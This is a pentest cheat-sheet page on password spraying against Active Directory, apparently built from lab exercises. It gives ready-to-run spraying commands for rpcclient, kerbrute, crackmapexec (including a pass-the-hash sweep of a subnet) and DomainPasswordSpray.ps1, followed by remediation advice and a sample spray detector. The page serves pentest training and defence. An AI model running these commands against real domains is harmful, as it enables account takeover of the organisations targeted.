# Password Spray

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FZ2GOHuuy7vsuRs9oxA6r%2Fimage.png?alt=media&#x26;token=d36db073-9900-459e-9931-e93e008ad09a" alt=""><figcaption></figcaption></figure>

{% content-ref url="../protocols/smb-445-139-rpc" %}
[smb-445-139-rpc](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/smb-445-139-rpc)
{% endcontent-ref %}

Start by identifying valid users and checking the domain password policy (lockout threshold and observation window) before spraying:

{% content-ref url="users-identification" %}
[users-identification](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/users-identification)
{% endcontent-ref %}

{% content-ref url="password-policy" %}
[password-policy](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/password-policy)
{% endcontent-ref %}

## Custom Wordlist

LDAPWordListHarvester:

{% embed url="<https://github.com/TheManticoreProject/LDAPWordlistHarvester>" %}

pyLDAPWordlistHarvester:

{% embed url="<https://github.com/p0dalirius/pyLDAPWordlistHarvester>" %}

GeoWordlists:

{% embed url="<https://github.com/p0dalirius/GeoWordlists>" %}

## RPCclient

```shell-session
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
```

## Kerbrute

```shell-session
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
```

## CME

```shell-session
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
```

```shell-session
crackmapexec smb 172.16.5.5 -u valid_users.txt -p Welcome1 --continue-on-success
```

Username used as password (each user is tried only against its own name, not every combination):

```shell-session
cme smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce --continue-on-success
```

### Local admin

```shell-session
sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
```

## SprayHound

{% embed url="<https://github.com/Hackndo/sprayhound/tree/5e0e5b757ab1ab8f832eddea2fad883f2773bc6e>" %}

## CaptainCredz

{% embed url="<https://github.com/synacktiv/captaincredz>" %}

## Conpass - Continuous password spraying tool

{% embed url="<https://github.com/login-securite/conpass>" %}

## Powershell - DomainPasswordSpray.ps1

```powershell-session
PS C:\htb> Import-Module .\DomainPasswordSpray.ps1
PS C:\htb> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
```

## Spray - Usernames

{% embed url="<https://github.com/Greenwolf/Spray/tree/master/name-lists/statistically-likely-usernames>" %}

## Remediation

The following security controls should be implemented to mitigate password spraying:

* **Create passwords for local administrator accounts, service accounts, and break glass accounts that are long (30-character minimum), unique, unpredictable and managed**. [Microsoft’s Local Administrator Password Solution (LAPS)](https://learn.microsoft.com/en-au/windows-server/identity/laps/laps-overview) can be used to achieve this for local administrator accounts. Using strong passwords reduces the likelihood of successful password spraying.
* **Create passwords used for single-factor authentication that consist of at least four random words with a total minimum length of 15 characters** to reduce the likelihood of successful password spraying.
* **Lock out user objects, except for break glass accounts, after a maximum of five failed logon attempts.** Enforcing an account lock threshold after five failed authentication attempts reduces the number of possible attempts in password spraying.
* **Ensure passwords created for user objects are randomly generated,** such as when a user object is created, or a user requests a password reset. Malicious actors will try to identify reused passwords and use these in password spraying to increase the likelihood of success.
* **Configure the built-in ‘Administrator’ domain account as sensitive to ensure it cannot be delegated.**
* **Scan networks at least monthly to identify any credentials that are being stored in the clear.** Malicious actors scan networks for cleartext credentials to use in password spraying. Locating and removing these cleartext credentials proactively mitigates this risk.
* **Disable the NTLM protocol.** The NTLM protocol does not support MFA and can be misused by malicious actors to bypass MFA requirements.

{% embed url="<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03>" %}
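As an added example (not part of this page or the ACSC guidance), a minimal detector for the pattern the controls above aim to limit: one source failing logons against many distinct accounts inside a short window, which is what the CME, Kerbrute and rpcclient loops above look like in the logs. The log format is a constructed simplification of Windows 4625 (failed logon) and 4771 (Kerberos pre-authentication failed) events, and the window and user-count thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of failed-logon events, one per line:
# timestamp, event id, target user, source IP. Not real logs.
SAMPLE_LOG = """\
2024-05-01T09:00:01 4625 user=alice src=10.0.0.5
2024-05-01T09:00:02 4625 user=bob src=10.0.0.5
2024-05-01T09:00:03 4771 user=carol src=10.0.0.5
2024-05-01T09:00:04 4625 user=dave src=10.0.0.5
2024-05-01T09:00:05 4625 user=erin src=10.0.0.5
2024-05-01T09:00:06 4625 user=frank src=10.0.0.5
2024-05-01T09:00:30 4625 user=alice src=10.0.0.9
2024-05-01T09:05:00 4625 user=alice src=10.0.0.9
2024-05-01T10:30:00 4625 user=bob src=10.0.0.9
"""

LINE_RE = re.compile(r"^(\S+) (4625|4771) user=(\S+) src=(\S+)$")

def parse_events(text):
    """Parse the constructed log lines into sorted (timestamp, user, src) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m.group(1)), m.group(3).lower(), m.group(4)))
    return sorted(events)

def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return {src: max_distinct_users} for sources that fail logons against
    at least `min_users` distinct accounts within any `window`-long span.
    One slow-and-low attacker (10.0.0.9) stays under the threshold; a fast
    spray from 10.0.0.5 is flagged. Sliding window keeps this O(n) per source."""
    by_src = defaultdict(list)
    for ts, user, src in events:
        by_src[src].append((ts, user))
    hits = {}
    for src, evs in by_src.items():
        start, counts = 0, defaultdict(int)
        for ts, user in evs:
            counts[user] += 1
            while ts - evs[start][0] > window:      # evict events older than the window
                old = evs[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            if len(counts) >= min_users:
                hits[src] = max(hits.get(src, 0), len(counts))
    return hits
```

Lowering `window` or raising `min_users` trades sensitivity to slow sprays (tools such as Conpass, which pace attempts under the lockout threshold) against false positives from shared NAT addresses.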

## Interesting Book

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
***Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.*
{% endhint %}

* [**Pentesting Active Directory and Windows-based Infrastructure**](https://www.amazon.fr/dp/1804611360?tag=0xss0rz-21)\
  Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations
* [**Infrastructure Attack Strategies for Ethical Hacking**](https://www.amazon.fr/dp/8196994729?tag=0xss0rz-21)\
  Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.
* [**RTFM: Red Team Field Manual v2**](https://www.amazon.fr/dp/1075091837?tag=0xss0rz-21)\
  A quick reference when there is no time to scour the Internet for that perfect command
* [**Red Team Development and Operations: A practical guide**](https://www.amazon.fr/dp/B0842BMMCC?tag=0xss0rz-21)\
  The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.
* [**Cybersecurity Attacks – Red Team Strategies**](https://www.amazon.fr/dp/B0822G9PTM?tag=0xss0rz-21)\
  A practical guide to building a penetration testing program having homefield advantage

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
